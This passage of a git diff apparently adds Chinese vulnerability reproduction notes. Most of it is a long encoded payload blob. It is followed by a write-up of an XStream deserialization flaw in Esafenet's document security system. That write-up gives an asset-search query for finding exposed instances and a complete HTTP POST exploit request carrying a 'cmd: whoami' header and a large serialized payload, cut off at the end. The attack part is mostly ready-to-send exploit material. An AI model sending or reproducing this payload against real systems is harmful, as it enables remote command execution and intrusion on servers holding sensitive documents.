BEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606299203-ae668e8f-60a5-4ca7-8f77-05138f2295a5.png](./img/w2S5lXWsKhKjT4IE/1706606299203-ae668e8f-60a5-4ca7-8f77-05138f2295a5-346928.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ayqeehnqp4bsmaey>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..083daee
--- /dev/null
+++ b/亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统GetUsecPolicyService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/f8IquKc4XSKxx-sl/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-786266.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/GetUsecPolicyService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAE